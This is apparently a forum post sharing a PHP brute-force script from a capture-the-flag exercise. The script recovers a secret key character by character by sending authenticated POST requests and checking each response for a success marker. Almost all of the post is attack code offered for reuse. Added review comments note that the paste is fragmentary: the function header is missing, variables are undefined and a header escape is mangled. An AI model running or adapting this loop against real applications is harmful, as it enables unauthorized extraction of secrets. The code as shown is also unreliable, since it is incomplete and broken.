Just posting this for anyone who may need something similar in the future. The code below is a quick script I use to brute-force/programmatically assess form injection. I wrote it when working through (CTF NAME REDACTED). If it helps, enjoy. Please attribute appropriately if you repurpose it, however.
// Name: PHP-Injector-Template
// Author: Brian Mork (Hermit)
// Last Modified: 2016-04-08
// This version assumes basic authentication and POST method
//
// NOTE(review): the paste is a fragment. The stretch from $options down to the
// `return null;` reads as the body of post_data() -- the loop further down calls
// post_data($testkey) and this stretch returns $trialdata -- but the `function`
// header, its closing brace and the opening `<?php` tag are not present, and
// $leveluser, $levelpass, $url and $testpush are never assigned in what is shown.
// NOTE(review): the header separator is the literal text "rn"; the CRLF escape
// sequence appears to have been lost in the paste (the "\n" escapes elsewhere
// survived), so the Authorization header would not be parsed as a separate line.
$options = array(
    'http' => array(
        'header' => "Content-type: application/x-www-form-urlencodedrnAuthorization: Basic " . base64_encode("$leveluser:$levelpass"),
        'method' => 'POST',
        'content' => http_build_query($testpush)
    )
);
// Build the context for the request using all of the above
$context = stream_context_create($options);
// Actually submit it
$result = file_get_contents($url, false, $context);
// Check for a failed connection state (just in case)
if ($result === FALSE) {
    print "Failed to connect\n\n";
} else {
    // Look for "INDICATOR" which indicates successful injection and return based upon that...
    // The response body is the only oracle: a fixed marker string present in the
    // body means "this prefix was accepted", anything else means "rejected".
    // Defender's view: an application that returns a uniform response regardless
    // of outcome removes this marker and the whole loop below has nothing to key on.
    if (preg_match("/INDICATOR/", $result)) {
        return $trialdata;
    } else {
        return null;
    }
}
// Zeroize the recovery key
$recoverkey = '';
// Build an array which is [A-Za-z0-9]
// Modify as appropriate for other use cases
// range(0, 9) yields integers; string concatenation below coerces them to "0".."9".
$allchars = array_merge(range('A', 'Z'), range('a', 'z'), range(0, 9));
// List how many characters to limit the search to
$loopcount = 123;
// Loop through and test
// One position of the key is recovered per outer iteration; each position costs
// up to count($allchars) requests whose payload differs only in the last character.
// Defender's view: that burst of near-identical POSTs with a one-character-longer
// payload each time is the pattern request-rate limits and WAF/IDS rules can alert on.
foreach ( range(1, $loopcount) as $looper ) {
    // String flag rather than a boolean; the === checks below are consistent with it.
    $breakflag = 'FALSE';
    foreach( $allchars as $onechar) {
        // Bypass method to avoid unnecessary tries
        // (the inner loop still walks the remaining characters after a hit; the
        // flag only suppresses further requests, it does not `break`)
        if ($breakflag === 'FALSE') {
            // We need to track the single character separately from the injection test
            // so the below builds the test portion
            $testkey = $recoverkey . $onechar;
            // Check it using the above function
            $poscheck = post_data($testkey);
            // If we didn't get null, it was good... let me know!
            if ($poscheck !== null) {
                $breakflag = 'TRUE';
                $recoverkey .= $onechar;
                echo "\nFound new position! Current recovery is: " . $recoverkey . "\n";
            } else {
                // I just like to see that it's still working
                echo ".";
            }
        }
    }
    // NOTE(review): if no character matches at this position, $recoverkey is left
    // unchanged and the next outer iteration retries the same prefix; there is no
    // early exit for "key fully recovered" or "no progress" in what is shown.
}
// Once we've reached the full number of characters, break and print the key
// (no actual `break` exists; this line is reached after all $loopcount iterations)
print "Found key of: " . $recoverkey . "\n\n";
?>